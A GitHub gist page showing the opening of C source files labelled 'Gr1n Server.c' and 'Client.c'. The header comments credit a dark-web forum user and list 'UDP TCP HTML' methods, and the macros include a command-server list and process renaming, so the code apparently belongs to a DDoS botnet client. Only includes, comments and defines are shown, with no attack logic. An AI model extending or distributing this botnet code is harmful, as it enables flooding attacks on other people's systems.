Skip to content

Instantly share code, notes, and snippets.

View WHOLETTHEDOG-OUT's full-sized avatar
🎯
Focusing

WHOLETTHEDOG-OUT WHOLETTHEDOG-OUT

🎯
Focusing
View GitHub Profile
// Gr1n Server.c
// Made By Gr1n 02.1.2017
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
// Client.c Made By @Gr1n1337 -
// DeepWeb Fourms User Name - Gr1n -
// This Client Only Has UDP TCP HTML -
//---------------------------------
#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2
#define PRINT_BUF_LEN 12